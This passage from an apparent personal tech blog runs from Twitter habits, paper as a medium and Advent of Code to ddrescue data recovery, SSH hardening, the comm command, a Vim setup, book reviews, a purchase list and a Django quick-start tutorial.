    For good measure, I also use ROUND() to round to two decimals. Note the cast to numeric: ROUND() with a precision argument expects a numeric value, not a double precision one.

  • Ten years on Twitter 🔟❤️

    Today marks my ten year anniversary on Twitter! There are few other web services I have been using for ten years. Sure, I have been e-mailing and blogging for longer, but those are activities — like browsing — and not specifically tied to one service (e.g. Gmail is just one of many mail services). And after ten years, Twitter is still a valuable and fun addition to life online. But it takes a bit of work to keep it fun and interesting.

    TL;DR

    • Twitter is your Bonsai tree: cut and trim.
    • Use the Search tab, it’s awesome!
    • Stay away from political discussions.
    • Be nice! No snark.
    • Bookmark all the things.

    Twitter, the protocol

    Twitter, of course, provides short synchronous one-to-all updates. In comparison, mail and blogging are asynchronous. Their feedback loop is different and they’re less instant. And WhatsApp or messaging are forms of one-to-many communication and they’re not public (so not one-to-all). So Twitter takes a unique place among these communication options.

    Effectively the service Twitter provides is its own thing. Because Twitter is more a protocol, or an internet utility if you like. And more often than not, protocols or utilities tend to get used in ways they weren’t supposed to. I’ve written about Twitter many times before. And I love blogging and RSS but Twitter for me is still the place for near real-time updates. This post is part celebration of Twitter and part tips on how I, personally, use this protocol to keep it fun and interesting.

    Bonsai

    Twitter can be many things to many people. For some people it can be the number one place to get their news on politics. For others Twitter is all about comedy (Twitter comedy is certainly a fun place!) or sports (I do follow quite a bit of NBA news). And some people just jump in, enjoy the moment, not caring about what came before and logging off again. And that is fine, but that is just not how I roll. When I follow you, I care about what you have to say, so I make an effort to read it.

    So I am careful about following people that tweet very often. When I check out a profile page, and see a user with 45,978 updates, that’s usually an indication that I will not follow that account. But, this is me. I see my Twitter timeline like a bonsai tree, cutting and trimming is an integral part of keeping things manageable. Because when you’re not careful, Twitter can become overwhelming. Certainly when you’re a strict chronological timeline user, like I am. But, sparingly following accounts can make you miss out on great stuff, right?

    Search tab

    My solution to this problem is the Search tab (available on the app and mobile). Because this tab is actually pretty good! Twitter knows my interests based on a cross-section of accounts I follow, and in this tab it makes a nice selection of tweets that I need to see. It is my second home, my second timeline. Usually I catch up on interesting things of otherwise loud Twitter accounts (i.e. lots of tech accounts that I don’t follow). So Twitter helps me to point out things that I still would like to see. I get the best of both worlds. It’s great!

    Politics

    There are few subjects as flammable as politics on Twitter. So I try to stay away from politics and try not to get involved in political discussions. That doesn’t mean I am not aware of things going on, or that I am not interested in politics. Quite the opposite! I just don’t think Twitter is the best place for political debate. The new 280 character limit was an improvement, but it’s still too short for real discussions or nuance (maybe this is true for the internet as a whole). Sure, certain threads can provide insight, and some people really know what they’re talking about. But I will think twice before personally entering a discussion. I do follow quite a bit of blogs/sites on politics and Twitter helps me to point to those things. These places usually help me more in understanding things that are otherwise hard to express in 280 characters.

    Be positive

    It is very easy to be dismissive or negative on Twitter. But very little good comes from that. So I always try to add something positive. I recently came across this tweet, and I think this sums it up rather well:

    Pointer

    Like stated Twitter can be many things to many people. But from day one, for me it has always been a place to point and get pointed to interesting things. The best Twitter for me is Twitter as a jump-off zone. My love for Twitter comes from the experience of being pointed to great books, movies, blogs, (music) videos and podcasts. And I am a heavy user of the bookmark option. (I tend to like very little on Twitter, which is more of a thank you nowadays.) But I bookmark all the things. Usually I scan and read my timeline on mobile, bookmark the interesting things and come back to it later in the day on a PC.

    What’s next?

    I had been blogging for a few years when Twitter came along. So I have never been able to shake the feeling of seeing Twitter as a micro blog for everyone. (Which is just one of its uses.) I am also aware of concepts like micro.blog, matrix.org or Mastodon. Services that, at the very least, have been inspired by Twitter, and build further on the idea of a communication protocol. But the thing is, Twitter was first, and Twitter is where everybody is. It’s part of the plumbing of the internet now, I don’t see it going away soon and that is all right by me! Cheers!

  • Can we replace paper?

    Paper always beats rock and scissors. Because one of the few inventions greater than writing itself, is writing on paper. Paper writings are absolute, self-contained and transferable units of knowledge, which after publishing become and stay available and accessible for hundreds of years or more.

    Don’t take my word for it, there is this great quote by J.C.R. Licklider found in Libraries of the Future and brought to my attention by Walter Isaacson in The Innovators.

    Message and medium

    Take da Vinci’s work. We are able to witness and experience and read the exact paper he put his thoughts on some 500 years ago. Our language may have changed but the medium and therefore message survived. You can pick it up, look at it, and see exactly what he saw (if you can afford it).

    And in the same vein, I can easily pick up a book, written and printed 100 years ago, and read it. Or closer to home, I can open any textbook I used in college from my bookshelf and read it. And my class notes just sit in a box, unchanged, ready to be read. All I need are my eyeballs. But my 3.5 inch floppies from that era, I can no longer access those (with ease). And the CD-ROMs, I wonder if they would even work. And when the medium becomes inaccessible the message is lost.

    Part of my bookshelf

    The internet

    So as I am typing this on an electronic digital device, that translates key presses into binary numbers which are stored on a solid state disk on another computer somewhere else, which is connected with my device through countless other specialised electronic devices and protocols, I can’t help but wonder about what will be left in 100 years — or more — from what is written everyday on the internet.

    The internet is right up there with the written word as one of our greatest inventions, but it is much more fragile and dependent on many layers (i.e. electricity, storage, network, specialised devices, formats) that all interact with one another.

    We have accumulated large parts of human knowledge in millions of paper books over the past millennium, but most written text nowadays is digital. And digital formats and transfer methods change. Fast and often. So I wonder how we can best preserve our written thoughts for the next millennium: self-contained and transferable. But I can’t come up with anything better than paper?

  • Advent of Code

    Advent of Code is a yearly programming contest created by Eric Wastl and it is currently being held at adventofcode.com. That means that this site spawns two daily programming challenges — until Christmas — to see who can solve them the fastest. But it is not just about being fast, Advent of Code is also a great way to improve your programming skills with daily puzzles or learn a new language. Because everyone gets the same daily puzzles it is also a great way to share and discuss results, and above all, learn.

    Though I knew of Advent of Code, I hadn’t participated before, but it seems two days, and four puzzles later, I am sort of in. Or at least, after only two days I am already fascinated by what I have seen, so I thought I’d share!

    Fascinating findings

    • Python seems to be the most popular language, by far. At least judging by Github repo names, which is of course not an exact measure, but it is more or less an indicator, as a lot of people tend to share their solutions there. Python is the most popular language, and it isn’t even close:
    • Browsing through the code, it — once again — becomes apparent that even with the exact same tools (e.g. Python) we all bring different experiences and education to the table which results in a colorful variation of solutions for the exact same puzzles. I’ve seen 100+ lines of Python code generate the exact same result as 10 lines. Advent of Code emphasizes that we are all unique individuals, and there is not a specific right way, just as long as you get there.
    • If I had to guess, I would have picked JavaScript to be the most popular language. But as you can see it only comes in second. Ruby, Go and C# are also unsurprising entries on this list, but Haskell and Elixir are surprising — to me at least. These two functional languages seem to have quite a bit of buzz around them and people seem to passionately pick these languages as their language of choice, which is interesting as I know very little about either. Fun side note: even the creator of Elixir participates in AoC!
    • Very few people seem to pick PHP. Which I also find surprising, because gigantic parts of the web run PHP. But PHP seems to have little appeal when it comes to coding challenges?
    • Some people are fast, I mean really fast! Just look at the times on the leader board. Judging from these times, this means some people are able to read around 1000 words explaining a puzzle, and then code up not one, but two solutions and submit the correct answer in under four minutes! I kid you not. This next person live-streamed it, and clocks in around 5 minutes (even without using command-line shortcuts like CTRL-R), and — here’s the kicker — it didn’t even put him in the top 20 for that day!
    • Of course you can use any language you like or even pen and paper, it is a puzzle after all. And people use some really crazy stuff, I love it! Anything goes, even Excel, and I think that is one of the goals of AoC: try to learn new things! There is one person who deliberately tried a new language for each challenge.

    Notable entries

    So it’s not all about speed, it’s also about trying new things. Here are some other unexpected examples.

    • Minecraft: This one takes the cake for me. See if you can wrap your head around what is happening here:

    Personal learnings so far

    So apart from these fascinating findings, I also got involved myself. I think because I solved the very first challenge with a simple AWK one-liner. But solving the followup challenge seemed trickier in AWK, though people seem to have done so (of course).

    Being completely new to Python, and seeing how popular it is, I decided to give it a go, and I must say I think I understand a bit better now why and how Python is so popular. Yes, it is well known that it deliberately forces clean code, but it also provides ways to write incredibly succinct code. And so far I have learned about map(), collections.Counter, zip() and itertools.cycle(). Very handy built-in functions and datatypes that I was unaware of, but which are incredibly powerful.
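
    To give an idea of what I mean, here is a toy illustration of those functions (not an actual puzzle solution, just made-up data):

    from collections import Counter
    from itertools import cycle

    # Counter counts occurrences in one line
    votes = ["red", "blue", "red", "green", "red", "blue"]
    print(Counter(votes).most_common(1))        # [('red', 3)]

    # map applies a function to every element
    print(list(map(int, ["1", "2", "3"])))      # [1, 2, 3]

    # zip pairs up two lists element by element
    print(dict(zip(["a", "b"], [1, 2])))        # {'a': 1, 'b': 2}

    # cycle repeats a sequence endlessly, handy for wrap-around puzzles
    wrap = cycle([0, 1, 2])
    print([next(wrap) for _ in range(5)])       # [0, 1, 2, 0, 1]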

    Some people tend to disagree (probably very few), as I found this comment on StackOverflow when researching the Counter dict.

    I don’t think that’s fair, because in a sense every higher level programming language is an abstraction of differently expressed machine code. So unless you’re typing in machine code directly you are also using general purpose tools, and how narrow or general something is, who’s to say? And as long as it helps people do things faster — programming languages are tools after all — I’m all for it. Just let the computer worry about the zeros and ones.

    I was very surprised and pleased with the mentioned Python functions. For example, I brute-forced a solution in Bash which took probably more than 10 minutes to run, but which ran in 0.07 seconds in only a couple of lines of Python. So, of course, the knowledge of the right functions and data structures once again proved to be the difference between 100 lines and 10, which reminded me of this quote from Linus Torvalds:

    So that’s it and if you want to learn something new, go give it a try!

  • Save data from your broken Raspberry Pi SD card with GNU ddrescue

    This week my Pi stopped working. After hooking up a monitor I saw kernel errors related to VFS. So the file system was obviously broken. Oops.

    The conclusion is that the SD card is physically ‘broken’, but I still managed to salvage my data — which is more important than the card. Here’s how.

    Broken file system: fsck or dd?

    What didn’t work for me, but you might want to try first, are fsck (for a file system consistency check) and dd (to create a disk image).

    I couldn’t check/repair the file system with fsck (it gave errors), not even when specifying alternative superblocks. It might work for you, so you can give this blog a try.

    Next, I tried to ‘clone’ the bits on the file system with dd, to get a usable image. But that didn’t work either; it kept spewing out errors. This is where I stumbled across ddrescue.

    GNU ddrescue

    I had not heard of ddrescue before but it turned out to be a life datasaver! It does what dd does, but in the process tries “to rescue the good parts first in case of read errors”. There are two versions of this program, I used the GNU version.

    sudo apt-get install gddrescue

    And here is what a sigh of relief looks like, after 43 minutes:

    So the command is:

    ddrescue -f -n /dev/[baddrive] /root/[imagefilename].img /tmp/recovery.log

    The options I used came from this blog:

    • -f Force ddrescue to run even if the destination file already exists (this is required when writing to a disk). It will overwrite.
    • -n Short for ‘--no-scrape’. This option prevents ddrescue from running through the scraping phase, essentially preventing the utility from spending too much time attempting to recreate heavily damaged areas of a file.

    After you have an image you can mount it and browse your data:

    mount -o loop rescue.img /mnt/rescue

    With this I had access to my data! So I got a new SD card, copied my data over and chucked the old card. And remember:

  • The Phoenix Project

    When a co-worker handed me a copy of The Phoenix Project, the 8-bit art on the cover looked fun. But the tagline — ‘A Novel About IT, DevOps and Helping your Business Win’ — sounded a bit like the usual buzzword management lingo. But I was clearly wrong, I loved this book!

    It is unlike anything I’ve read before and it really spoke to me because the situations were so incredibly recognizable. The book tells a fictionalized story where the main character, Bill, gets promoted — more or less against his will — to VP of IT Operations and subsequently inherits a bit of a mess. Things keep breaking and escalating, causing SEV-1 outages, all while the billion dollar company is having a bad couple of quarters and puts all its hope on Project Phoenix. An IT project that is supposed to solve anything and everything; already three years in the making and nowhere close to being finished.

    The story revolves around Bill and his struggle of how to turn things around. On his path to discovery he is mentored by an eccentric figure called Eric (who is such a great and funny character).

    https://www.magnusdelta.com/blog/2017/9/16/thephoenixprojectsummary

    I feel like Bill and I have a lot in common, mainly because the book is really spot on when describing situations IT departments can find themselves in. Some scenes were a literal copy of things I have experienced. As if the writers were there and took notes. It made me laugh out loud or raise my eyebrows on more than one occasion. The reliance on certain key-figures, the disruption of self-involved Marketing/Sales people, the office politics, the lack of trust in teams, the weight of technical debt, the difference between requirements and customer needs. It was all too familiar. So for me the power of the book is the true-to-life examples, because those provide the basis for arguing the successful application of the theory.

    Because the book is in fact the theory of DevOps compiled into an exciting story. Which is a lot more fun than it sounds.

    Actually the book could be seen as a modern day version of The Goal by Dr. Goldratt — a book about the Theory of Constraints — which I had of course heard of, but never read. The writers of The Phoenix Project make no secret of their admiration for Goldratt’s theory. But DevOps is of course a thing of its own. A relatively new paradigm, borrowing from TOC, Lean and Agile principles among other things. Its goal is ‘to aim at shorter development cycles, increased deployment frequency, and more dependable releases, in close alignment with business objectives’. The Three Ways theory is a central aspect, unifying culture with production flow, and the book shows how those theoretic mechanics work in practice. And that IT is closer to manufacturing than you might think, by breaking down the four different types of work there are in IT. That was actually an eye-opener for me. But I won’t go into too much detail about DevOps, I just wanted to point you in the right direction. If you work with different people to create anything in IT, you are probably going to like this book, and are bound to learn something.

     

  • Linux server principles

    This is a list, in no particular order, of principles to adhere to when running a secure Linux server.

    1. SSH – Never allow direct SSH root access (set PermitRootLogin No; see the example sshd_config snippet after this list).
    2. SSH – Do not use SSH keys without a passphrase.
    3. SSH – If possible, do not run SSH on a public IP interface (preferably use a management VLAN).
    4. SSH/SSL – Use strong SSH ciphers and MAC algorithms (Check with https://testssl.sh/).
    5. Never run anything as root (use sudo).
    6. Use deny all, allow only firewall principle. Block everything by default, only open what’s needed.
    7. Configure the mail daemon to use a smarthost (unless it’s a mailserver).
    8. Always use a timeserver daemon to keep server in sync (ntp).
    9. Always use a package manager and apply, at least once a month, updates (apt, yum etc.)
    10. Have backups in place and regularly test the restores.
    11. Do not just backup raw database data. Dump databases and backup those dumps (mysqldump, pg_dump).
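
    To illustrate the SSH points above, a minimal /etc/ssh/sshd_config excerpt could look like the snippet below. Treat it as a sketch: the IP address is made up and the cipher/MAC lists are only an example, check https://testssl.sh/ or your distro’s hardening guide for current recommendations.

    # /etc/ssh/sshd_config (excerpt, illustrative values)
    PermitRootLogin no
    # Prefer key-based logins (and put a passphrase on the key itself)
    PasswordAuthentication no
    # Only listen on the management VLAN interface (example address)
    ListenAddress 10.0.10.5
    # Explicitly chosen ciphers and MACs (verify current recommendations yourself)
    Ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com
    MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com
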
  • GNU coreutils comm is amazing

    Most people know sort and uniq (or even diff) and usually use a mix of these tools when comparing two files. However, sometimes there is a shorter solution than piping different commands together: comm is your answer!

    The comm(1) command is one of the most powerful but also underused text tools in the coreutils package.

    Comm’s manpage description is as simple as it gets: “compare two sorted files line by line”.  It does so by giving a three column output, from the manpage:

    With no options, produce three-column output. Column one contains lines unique to FILE1, column two contains lines unique to FILE2, and column three contains lines common to both files.

    Because you have two files, and you want to COMPARE them, usually one of these three options (and their parameters) is what you want:

    • Don’t give me the lines that are only in file1  (-1)
    • Don’t give me the lines that are only in file2 (-2)
    • Don’t give me the lines that are in both files (-3)

    How is that useful? Good question! Because the real magic is when you combine the parameters:

    comm -12 file1 file2
    Print only lines present in both file1 and file2.

    What this does is you only get the third column (lines in both files): you strip column 1 and column 2 from the output. Great!
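
    A tiny made-up example makes the columns clearer (file names and contents are invented; in the real output the second and third columns are tab-indented):

    $ cat file1          # already sorted
    alpha
    beta
    gamma
    $ cat file2          # already sorted
    beta
    delta
    gamma
    $ comm file1 file2   # column 1: only file1, column 2: only file2, column 3: both
    alpha
                    beta
            delta
                    gamma
    $ comm -12 file1 file2
    beta
    gamma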

    The man page is straightforward enough, go read it. But even though it is clear enough in the description, it is easy to overlook in practice (and I suspect this is one of the reasons comm is often misunderstood): the files you are comparing need to be in sorted order.

    I repeat, make sure your files are sorted.

    (Also, make sure there are no ‘strange’ characters (e.g. extra carriage returns) in your files. This can hinder comparing the files.)

    Luckily in bash sorting the files inline is easy:

    comm -3 <(sort file1) <(sort file2)

    There is a little bit more to the sorting, go read this if you’re interested. Just remember to keep the files sorted and you’re good!

  • My Vim setup

    The following lines are in my .vimrc file and make working with Vim all the better!

    I keep it pretty basic, so I don’t use the very popular fugitive.vim or NERDTree plugin.
    Put these lines in ~/.vimrc or /etc/vim/vimrc (depending on your distro, sometimes they are already there but need to be uncommented), and you’re good to go.

    As for a font, I like the Liberation Mono font (11pt).

    My .vimrc file
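
    For reference, here are all the lines discussed below combined into one file:

    :command W w
    :command Wq wq
    :command WQ wq
    syntax on
    au BufReadPost * if line("'\"") > 1 && line("'\"") <= line("$") | exe "normal! g'\"" | endif
    set fileencodings=utf-8
    filetype plugin indent on
    set expandtab
    set tabstop=4
    set shiftwidth=4
    set t_ti= t_te=
    set showmatch " Show matching brackets.
    set ignorecase " Do case insensitive matching
    set incsearch " Incremental search
    colorscheme molokai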

    Explanation

    :command W w
    :command Wq wq
    :command WQ wq

    I mapped these key combinations so that when I type too fast and make mistakes, Vim still does what I want it to do (save or save & quit).

    syntax on

    Some people don’t like syntax highlighting, I do.

    au BufReadPost * if line("'\"") > 1 && line("'\"") <= line("$") | exe "normal! g'\"" | endif

    This is the most complicated line in the config, but probably also the most useful! When you re-open a file your cursor will be where you left off. Indispensable.

    set fileencodings=utf-8

    UTF-8 all the things, yes please.

    filetype plugin indent on

    This is the only (non-default) plugin I use. It is actually a combination of commands, but most importantly it will try to recognize filetypes and apply file-specific settings (e.g. syntax highlighting).

    set expandtab
    set tabstop=4
    set shiftwidth=4

    OK, now we’re entering dangerous territory. I actually like tabs, but spaces are more file friendly/portable. So why not ‘map’ the tab to four spaces? With these three settings, I can use tabs, but Vim will enter 4 spaces and everybody wins.

    set t_ti= t_te=

    Normally when you exit Vim, the screen will clear, and you will be back to the prompt as if nothing happened. I don’t like this, I want to see whatever it was that I was working on. With this setting I return to the prompt and see the Vim screen above.

    set showmatch " Show matching brackets.

    You want this. Especially with bracket hungry languages like PHP. Stop searching for brackets/parentheses, Vim will highlight the matching pairs.

    set ignorecase " Do case insensitive matching

    Case insensitive matching is the best, I don’t have to worry about capitalization when searching for words.

    set incsearch " Incremental search

    When searching through a file (/) the cursor will move while typing. For some this may be disorienting, but you will find what you’re looking for with less typing.

    colorscheme molokai

    Vim comes with some preinstalled colorschemes, I tend to like molokai. It is clean, crisp and non-intrusive, even on an xterm-256 terminal emulator. When I switched servers, I switched the color scheme back to default. But molokai is still pretty nice.

  • The Soul of a New Machine – Tracy Kidder

    The Soul of a New Machine – Tracy Kidder

    The Soul of a New Machine by Tracy Kidder is one of those books that always seems to pop up when computer people share book recommendations. Exhibit A, exhibit B, exhibit C and so on — you get the picture.

    It is supposedly about computers, and I like computers! So I had to read it.

    And the “Winner of the Pulitzer Prize” notion on the cover also seemed promising!

    The Soul of a New Machine – Tracy Kidder (1981) – 293 pages

    I had assumed it was fiction; however, when I started reading it became pretty clear this is a non-fiction book. The Soul of a New Machine follows a Data General Corporation team of two dozen engineers in the late 70s who design a 32-bit computer — aka the Eagle — in an 18 month period, under enormous pressure and inspiring leadership, with ever moving deadlines and increasing market pressure.

    It’s an amazing read.

    These quotes from the author’s website pretty much cover what’s so great about it.

    Apart from being an exceptional book, here are specific things that stood out for me:

    • Whether it was sheer luck or a nose for the industry, Tracy Kidder was certainly in the right place, at the right time to write this story. The computer industry was still in its infancy and booming! And there were lots of companies doing similar things. But this particular company was at a crossroads and had this 32-bit computer challenge ahead of them. As a writer, those are the ingredients you want.
    • Yes, there are a lot of mind-blowing details in this book. Mind-blowing in the sense that people were able to build such a complex device but also mind-blowing that Kidder was able to write this entire process down in such lively detail.
    • Even then, computers were already incredibly complex. And computers tend to grow more complex over time. So when you take into account that this book describes enormously complex computer design from the late 70s it’s not that hard to imagine how we ended up, 40 years later, with problems like Meltdown and Spectre.
    • Computers like the Eagle were expensive. Most of the engineers who built it, pretty much couldn’t afford one. I always found this strange. This is probably the same for people who build really expensive cars.
    • When you are building a computer you could really benefit from using a computer. However this was not as straightforward as you might think. See the previous point: computers were expensive and had specific purposes. This part really put things in perspective for me.
    • Some of the engineers who worked on it didn’t even really like computers. Some because they saw a bleak future where computers would take over. And for others, it was just a puzzle to solve. 
    • Sure, this is a technical book of how a new computer was designed and built but at the heart this book is about people, relations, teamwork and leadership. The timelessness of this book is embodied not in the technical details but in the stories of how these people worked together and achieved their goals. (For lack of a better term, you could call it a management book.) And that is exactly what I like about it. I will probably forget the technical parts, no matter how interesting, but the colorful people, their backstories, motivation and relentless dedication will stay with you. I kept thinking I would also love to read such a book about people designing the original iPhone. The technical details would probably be different, but here’s the thing: I suspect there also would probably be a lot of similarities between them and this team from the 70s. Because in the end it’s about people trying to create something unique. 

    For me this book is a definitive must-read and I would personally really recommend this book to anyone. However I fully understand that this is not for everybody. It can come across as dry or too technical, but if you have ever engineered anything in or with a team or worked with strict but ever moving deadlines, you will recognize a lot and maybe even pick up a few things to put into perspective. 

    By the way, this is the machine they actually built (according to Google). The commercial name for the Eagle became the Data General Eclipse MV/8000. (picture is courtesy of the blog: The Soul of a Great Machine.)

  • Favorite 2017 purchases

    Favorite 2017 purchases

    Here’s a chronological list of some of the physical things/tools/gadgets I bought in 2017. Physical as in, I’m leaving out experiences, books and cryptocoins. Here we go.

    The Sony MDR-ZX110 headphones are decent aka good enough for my use, but more importantly also cheap enough so I don’t have to worry when I break them, which will eventually happen sooner or later. Which is mostly sooner in my experience with headphones. However these seem to be pretty durable so far, so I even got a second pair, for my wife.

    Sure, I took my time but 2017 was the year I finally got a PS4 (Slim 500GB). I also got Horizon Zero Dawn. This game alone is worth it. It’s one of the best games I’ve played. And with that one of the best Dutch export products ever. Go play it.

    Monster.

    The Stihl HS45 (60cm) hedge shears are pretty much the best hedge shears you can get. It’s the brand the pros use. I’m not a pro, but I like good tools. And because we moved, I needed to up my game from my Bosch electrical hedge shears. I love working with this machine.

    For our podcast we tried different setups and eventually settled on a pair of Neewer NW800 microphones. It is a pretty generic and widely available microphone which seems to get branded differently depending on …. who knows. (I am not sure about this, but I found multiple microphones on Amazon that look exactly like this one but have a different name.) I wouldn’t really advise these microphones for recording singing or anything that requires a large dynamic range, but for podcasting they’re fine (I find post-production to be more important for podcast sound quality).

    The Makita DF457D 18v 1.5Ah drill. I already owned a Makita drill, but that was a hand-me-down and it was starting to show (mainly the batteries), so it was time for a new one. So I chose a Makita, you can’t really go wrong.

    I previously blogged about my new G-Shock GSTS100G-1B watch here. Still great!

    The Einhell TC-SM2131 miter saw shouldn’t be in this list, because it was the worst thing I bought this year. Sure, it’s more of a budget brand, but it already came broken out of the box (defective laser). And I had to wait 3 weeks for repair, and then it broke again after one morning of use. So I returned this and will probably never buy anything Einhell again…

    It’s a big hit. Even with the youngest one.

    When the Nintendo Switch came out I had just gotten a PS4, so I had my hands full. But that thing sure looked enticing. And when the trailer for Mario Odyssey came out in June, it became pretty clear I would get a Mario Odyssey bundle. I love it. It’s an amazing machine, and such a FUN game. I also blogged about this.

    Look at this beast.

    Of course I had to get another miter saw. Even though I probably won’t use it much, this time I went with a professional brand: Metabo KGS216M. Even at twice the price, I’d say it’s worth it. It’s a delight to work with this machine and the difference is striking. Everything is just a bit more solid/sturdy/precise. It’s the small things that make for a professional and overall better experience.

    When the year drew to a close most game reviewers picked Zelda: Breath of the Wild as GOTY. Well, since I now owned a Switch I went out and got one. To be honest, I am still on the fence about this game. I just got it.

    So there you go! Anything particular you bought you’d like to share? Drop it in the comments.

  • Django in 10 minutes

    Django in 10 minutes

    This post is for myself, two weeks ago. I needed something like this. Or, maybe it’s for you? You know a little bit of Python, kind of understand the MVC concept and have a clear understanding of RDBMS? Congratulations, you will have no trouble getting something up and running in Django in a couple of minutes.

    Whether you need to move a database to an editable, shareable environment for less tech savvy people (phpMyAdmin), or move some spreadsheets to a database and want a quick CRUD setup? Django, a Python based web framework, can help. Follow these steps (yes, Django docs are great, but elaborate).

    Step 0 Database design

    The most important step. Forget about the rest if you don’t have this in order. Design a good database. Think about your keys and relations. You can use MySQL Workbench or edit Python code  (more on that later) to create a database. If you get this step right: Django takes care of the rest!

    Here is a small database setup I used. Made with MySQL workbench.

    MySQL workbench design

    So I created this, exported it and imported it into a MySQL database. But you can have a different approach. As long as you think about your database design.

    Step 1 Setup your environment

    Normally this would be the first step. But since database design is vital I made that the first step. So, I assume you have a Python environment, therefore you are gonna use virtualenv. You don’t need-need it, but it creates an environment where you can’t break too much. Python uses pip to install packages. Django itself is such a Python package, but most of the time you don’t want random development packages cluttering your main system. You want to keep all of that in your virtual environment. Virtual is a big word: it is just a dedicated directory.

    mkdir venv (or any name)
    virtualenv venv -p /usr/bin/python3.4 (or whatever your Python location is)
    source venv/bin/activate (activate the virtual environment)
    

    Bam! You are now *in* your virtual environment: noted by the prompt (venv). If you now invoke pip it installs packages only in that virtual environment. Want to leave the virtual environment? Type: deactivate.

    Step 2 Create your Django project and app

    Next, you need Django. You can install it system-wide or only within your virtual environment. Either way, just use pip:

    pip3 install Django
    pip3 install mysqlclient

    Now you have Django (and you have installed the mysqlclient with it). Depending on your system you may also need to install libmysqlclient-dev (apt-get install libmysqlclient-dev on Debian) for the mysqlclient to install correctly.

    Next: create a Django project. A Django project is a collection (a folder!) of apps. And apps are also folders. They all sit in the same root folder, together with the manage.py file. This next command creates a folder and within that folder another folder with the same name and it creates the manage.py file. This is your project.

    django-admin startproject my_fancy_project

    Next: create an app. Projects don’t do much by themselves: apart from some settings. So in the project directory where the manage.py file is, you type:

    python3 manage.py startapp my_awesome_app

    A folder will be created next to your project folder. This is your app folder and where most of the work will be done. You can create as many apps as you like. Some projects are one app, some are multiple. Apps share the project settings.
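
    So after these two commands the folder layout looks roughly like this (names from the examples above; the exact files depend on your Django version):

    my_fancy_project/
        manage.py
        my_fancy_project/      <- the project: settings.py, urls.py, wsgi.py
        my_awesome_app/        <- the app: models.py, views.py, admin.py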

    Step 3 Create your models

    Django comes with batteries included. Meaning, by default it has a db.sqlite3 file as a database. This database stores users and sessions and all that. However I want to use MySQL.

    On to the magic!

    So my database (step 0) is in MySQL.

    In your project settings.py file point your project to this database:

    DATABASES = {
        'default': {
            'ENGINE': 'django.db.backends.mysql',
            'NAME': 'iptv',
            'USER': 'iptv',
            'PASSWORD': 'my_awesome_password',
            'HOST': '127.0.0.1',
            'PORT': '3306',
        }
    }

    Now we want to tell Django to look at our database and DO THE WORK. Use the inspectdb command to INSPECT your database and AUTOCREATE a models.py file.

    python3 manage.py inspectdb > my_awesome_app/models.py

    The models.py file is your most important file. It holds the logic for your app. This is a file with essentially Python code that describes your database (every table as a class). You can also code it by hand, but inspectdb is very handy!
    Here is what my class/table/model called Package looks like in the models.py file. This is autogenerated by inspectdb. I added the __str__(self) function by hand (so you see the right name in Django). And notice how it links to your db_table ‘packages’.

    class Package(models.Model):
        idpackages = models.AutoField(primary_key=True)
        name = models.CharField(max_length=45, blank=True, default="", null=False)
    
        def __str__(self):
            return self.name
    
        class Meta:
            managed = False
            db_table = 'packages'

    Congratulations! You now have code that understands and can talk to your database!
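
    You can verify this from the Django shell. Here is a quick, illustrative session with the Package model from above (output shown roughly as Django 1.11 prints it):

    $ python3 manage.py shell
    >>> from my_awesome_app.models import Package
    >>> Package.objects.create(name="Basic")   # inserts a row into the existing 'packages' table
    <Package: Basic>
    >>> Package.objects.all()
    <QuerySet [<Package: Basic>]>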

    Step 4 Profit!

    You’re done. What do you mean? Well, this is where Django shines. It comes with a very capable Administrator interface, user management, logging and more. Django is designed to quickly get something up and running so people can start filling the database while you create a frontend (view). However for intended purposes, maybe you don’t need a frontend. Maybe the Administrator backend interface will do just fine.

    Okay, there are still a few steps. But you came this far, so the next steps are easy.

    Of course you need a user: create one. This will only work after you’ve done makemigrations and migrate (see below).

    python manage.py createsuperuser --username=jan --email=jan@j11-awesomeness.com

    This will create a Django user so you can log in to the admin backend. But wait, nothing is running yet. You can use whatever webserver you like, but batteries included, you can just start up a Python webserver:

    python manage.py runserver 0:8000
    
    (venv)[11:08:59]jan@server:~/projects/my_fancy_project$ python manage.py runserver 0:8000
    Performing system checks...
    
    System check identified no issues (0 silenced).
    November 22, 2017 - 10:09:02
    Django version 1.11.7, using settings 'project.settings'
    Starting development server at http://0:8000/
    Quit the server with CONTROL-C.

    This starts a webserver on port 8000 (choose whatever port you like). You can now browse to http://[youripaddress]:8000/admin and you will be presented with a login screen.

    Note that whenever you make changes to your database structure (don’t do this too often, start with a good design), you need to run the following:

    python manage.py makemigrations
    python manage.py migrate

    This will make a migration schedule for you, and migrate things. But you also need to use these commands to initially migrate from the built-in default database (db.sqlite3) to MySQL, after you have defined the DATABASES setting in settings.py (step 3).

    So, I have a user, I migrated my Django project to MySQL, I have my models.py file and I have a webserver running. So, I get a login screen like this on http://[youripaddress]:8000/admin

    Django administration login screen

    So I logged in. But where is my app? Where are my models/tables, so I can edit them? Well they are there, just not visible in the admin interface yet. In the settings.py project file, add your app to INSTALLED_APPS. And you’re done. You now have a complete CRUD environment where you can create and edit users and groups (Django default) and tables from your app (oh yeah!). It looks like this.

    Django administration interface
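
    One caveat, from my understanding of Django (double-check for your version): adding the app to INSTALLED_APPS makes Django aware of it, but to actually see your own models in the admin you usually also have to register them in the app’s admin.py, something like this:

    # my_awesome_app/admin.py
    from django.contrib import admin
    from .models import Package

    admin.site.register(Package)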

    When you click the tables (models!) you can see automatic dropdown lists with database relations and checkboxes and all that. This is all generated from the models.py file.


    Django contacts example
    Django channels example
    What’s next?

    As said, this is a quick way to get your data in the Django admin interface and start adding data, while you work on the frontend (views). I am not doing that, the admin is good enough for me. So, remember: apps are folders, the models.py file is important, most things are done with manage.py.

    Django is really popular and there are lots of tools/libraries you can use/hook into your own Django app. Just use pip. For example I use django-sql-explorer which is a full frontend to create, store and export SQL queries.

    Conclusion

    I like Django because, of all the things I tried (‘things’ being easy web CRUD tools), this made the most sense. I also like the start-with-your-database-design approach (very reminiscent of MS Access, which I love). However, I still think it is maybe too much work. Sure, if you have done it before, know virtual environments, know manage.py, know a bit of Python, this all really can be done in 5 minutes. Really. However, if you haven’t, maybe this could all be a bit overwhelming, so hopefully this blog helps! Or maybe there are even easier tools to get something up and running quickly?

  • Elon Musk: Tesla, SpaceX, and the Quest for a Fantastic Future

    Elon Musk: Tesla, SpaceX, and the Quest for a Fantastic Future

